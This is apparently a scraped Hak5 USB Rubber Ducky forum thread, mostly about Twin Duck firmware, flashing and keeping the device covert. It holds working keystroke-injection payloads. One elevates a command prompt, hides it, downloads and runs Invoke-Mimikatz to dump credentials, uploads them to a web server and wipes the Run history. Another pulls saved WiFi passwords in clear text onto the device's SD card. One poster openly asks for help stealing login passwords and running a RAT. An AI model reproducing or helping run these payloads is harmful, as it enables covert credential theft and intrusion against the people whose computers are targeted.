Search the Community

Greetings, I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet. I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address): DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit ENTER I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here?

So I got a rubber ducky 4 days ago and I been looking at all the YouTube videos but none them explain it well they all go straight to coding instead telling me what to download and what tools I need. I want to be able to steal passwords etc the computer login pass I saw that on YouTube. The is one when you can do a RAT? To control someone screen or view ther file. The also one where it saves passwords and emails it to yourself. Just want to be able to complete something that actually works not the 'hello world'. Like this script (what does it do and how can I make it work) https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload-Netcat-Reverse-Shell I really want to try this one too https://www.hak5.org/blog/15-second-password-hack-mr-robot-style So yeah just need help with it like step by step what I need to install or setup!

I had some serious issues trying to change the firmware on my ducky attempting to use ducky flasher with multiple versions of linux. I ultimately ended up using a windows based machine to make it work. My ducky is working pretty well except when I write payloads to test anything, because the ducky is setup in twin mode, it will open a window showing all the files on the sd card while executing the payload. Any thoughts or ideas of how to prevent this? It is extremely obvious that the ducky had been plugged in. Not very covert.

Hi! I just got my new rubber ducky and I wanted to get the duck to look like "a real USB device" when you plug it in. I got my inspiration from the HAK5´s own video (https://www.youtube.com/watch?v=JON76zbiL1o). The thing that i dont seem to understand is how I "install" the code to my rubber ducky. I am looking at the page as we speak but I dont understand how I am supposed to do. Do I just move the " c_duck_v2.1.hex" file to the ducky disk or is it something that I am missing? Pls help me, I am new to this. Be kind in the comments pls

Hi, I have ran into a slight disadvantage of using twinduck firmware. Most Windows versions will auto mount and open the USB drive. This kind of messes with my delays and active windows, causing the duck to 'type' into an explorer window rather then the powershell or run prompt. Any way of disabling or delaying this Windows behaviour? Cheers, Void

I've been trying to flash my ducky to the twin duck but my ducky seemingly will not enter DFU mode. I tried it on both windows 10 and Ubuntu but neither will work has anyone else had this problem and fixed it?

**This is my mod to the original by Siem. I changed it to save to the SD card while running twin duck software. I used code from different sources and compiled it as I am still learning. REM Title: WiFi password grabber save to twin duck SD REM Author: silent_noise REM Original by: Siem REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt. Then saves to the CD card on the twin duck REM requires Twin Duck firmware and SD card to be named "DUCKY" REM Adjust time for driver install DELAY 3000 REM Minimize all windows WINDOWS d REM Open cmd & bypass UAC DELAY 500 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 500 ALT y DELAY 600 REM Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 100 REM Getting SSID STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A ENTER REM Creating A.txt STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt ENTER REM Get network type STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A ENTER REM Get authentication STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A ENTER REM Get password STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A ENTER REM Delete A.txt STRING del A.txt ENTER REM Create Log.txt STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt ENTER DELAY 100 REM Send Log.txt to sd card STRING copy Log.txt %duck%\%computername%-wifi-passwords.txt ENTER DELAY 500 REM Delete Log.txt and exit STRING del Log.txt & exit ENTER

I'm sure you have had this question asked many times in the past, but is it/would it be possible for an owner of a rubber ducky to update the SPI Protocol on their own to allow for faster speeds in a TwinDuck setup or is it a concrete set part of the device. I understand that the upgrade would cost a bit just wondering if it's possible.

Produced due to demand: a merge of the multi-duck (former Naked Duck, now know as Detour Duck), and the Twin-Duck firmwares. Duck will initially mount as Mass Storage Device. Numlock - triggers payload 1 (inject.bin) Capslock - triggers payload 2 (inject2.bin) Due to memory restrictions, as both payloads are loaded into Ducky memory - you are limited to 2048-Bytes of instructions! Also only one payload can be triggered, so you have a choice payload A or payload B. NOT BOTH!!! Download: http://code.google.com/p/ducky-decode/downloads/detail?name=cm_duck.hex&can=2&q= ~~Snake

NEW Version 2.0 of my USB SwissKnife (Faster, Smaller and concealed, With new USB Ruber Ducky 2.0) Since HAK5 recently lowered its price on the USB Ruber Ducky, I decided it was time to update my old USB SwissKnife! So this one is quite simple; A HAK5 USB Ruber Ducky with the TwinDuck (Composite HID + Mass Storage) firmware with a 8Gb SD card + a 32Gb Bootable USB drive. The Bootable USB Drive is exactly like the old one except that I increased from 16Gb to 32Gb… So the old one still correctly describe that portion. However, the new version of the Ruber Ducky is quite different; - It run on custom hardware instead of using a Teensy. - It has its own scripting language. - It is officially supported by some Penetration Testing software. - Require no programming skill to operate and update payload. - Support Mass Storage from the payload SD card. - Faster and slimmer hardware… So it effectively supersede the older versions, including mine… Now, the question is; can I make it better? Well, the only down side is the speed of the USB Mass Storage which is way too slow to use it as a Bootable USB key, It is still good enough for small Application, Script and Payload so I’ll reserve that storage space for that purpose only, which is still very useful since you can access the payload without removing the SD card. In order to add a Bootable USB Key to the mix, I would need to do the same thing I did on the old version, which is adding a HUB… But this time I realized that I have never used both the HID attack vector and the Bootable USB key at the same time, which kind of make sense since one Inject a payload in a foreign OS, the other Boot an OS on a foreign machine, they are 2 different thing so why not use 2 different key? Well, simply because I want to carry only 1 key! All that to say that this hack simply consist of putting the 2 USB devices in the same plastic package, the real hack is what you put on and do with them! Check OLD Version 1.0 for details about the bootable USB tools...